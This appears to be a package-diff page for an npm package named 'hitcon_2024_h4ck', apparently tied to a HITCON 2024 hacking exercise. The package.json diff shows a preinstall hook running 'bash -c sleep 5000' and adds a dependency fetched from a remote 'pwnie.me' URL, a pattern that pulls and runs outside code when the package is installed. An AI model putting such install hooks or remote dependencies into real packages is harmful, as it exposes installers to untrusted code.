hitcon_2024_h4ck 1.0.2 → 1.0.4
Sign up to get free protection for your applications and to get access to all the features.
- package/{index.js → index.tsx} +3 -0
- package/package.json +3 -2
package/{index.js → index.tsx}
RENAMED
package/package.json
CHANGED
@@ -1,12 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "hitcon_2024_h4ck",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.4",
|
4
4
|
"description": "",
|
5
|
-
"main": "index.
|
5
|
+
"main": "index.tsx",
|
6
6
|
"scripts": {
|
7
7
|
"preinstall": "bash -c sleep 5000",
|
8
8
|
"test": "echo \"Error: no test specified\" && exit 1"
|
9
9
|
},
|
10
|
+
"dependencies": {"@package/package": "https://38205e06.pwnie.me/@package/package@1.0.0"},
|
10
11
|
"author": "",
|
11
12
|
"license": "ISC"
|
12
13
|
}
|